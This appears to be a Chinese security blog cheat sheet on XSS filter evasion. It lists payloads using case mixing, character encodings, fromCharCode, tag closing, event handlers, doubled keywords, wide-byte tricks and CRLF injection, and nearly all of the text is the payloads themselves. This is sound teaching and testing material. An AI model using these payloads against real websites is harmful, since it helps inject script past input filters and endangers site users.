初入XSS

XSS绕过常用方法

1、大小写绕过

<ScRIpT>alert(‘123’)</sCRIpT>

2、编码绕过

  • 1.十六进制编码
  • 2.jsfuck编码
  • 3.url编码
  • 4.unicode编码

<0x736372697074>alert(‘123’)</0x736372697074>

<img src=”1″ onerror=”alert&#x28;1&#x29;”>

3、绕过magic_quotes_gpc

<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)</script>

4、标签

闭合标签

“><script>alert(/123/)</script>

</script><script>alert(1)</script>

标签绕过

<img src=”x” onerror=”alert(1)”>

<button onclick=”javascript:alert(‘xss’)>XSS</button”>

<title><img a=”</title><img/src=1 onerror=alert(1)//”>

“onsubmit=javascript:alert(1)%20name=”a

<details open ontoggle=”eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))”>

<video src=”http://www.0dutv.com/plug/down/up2.php/104678898.mp3″ onprogress=$(‘body’).prepend(123);$(‘body’)></video>

5、其他符号绕过

%0a         替换空格

%0d         替换空格

/**/          替换空格

%00          截断

“              替换括号

6、双字符绕过

<img ononerrorerror=”123″>

<script>alalertert(123)</script>

7、宽字节绕过

  • gbxxxx系列的编码,那么我们尝试一下宽字节  %c0,%bf,%5c,%df

8、其他事件绕过

onload

onclick

onerror

prompt

confirm

onmousemove

9、CRLF injection绕过

CRLF是”回车 + 换行”(\r\n)的简称。

http://www.xxx.com%0d%0a%0d%0a<svg/onload=prompt(1)>

【本文由 安全脉搏编辑w2n1ck 编写,转载请注明“转自安全脉搏”,并附上链接: https://www.secpulse.com/archives/59497.html】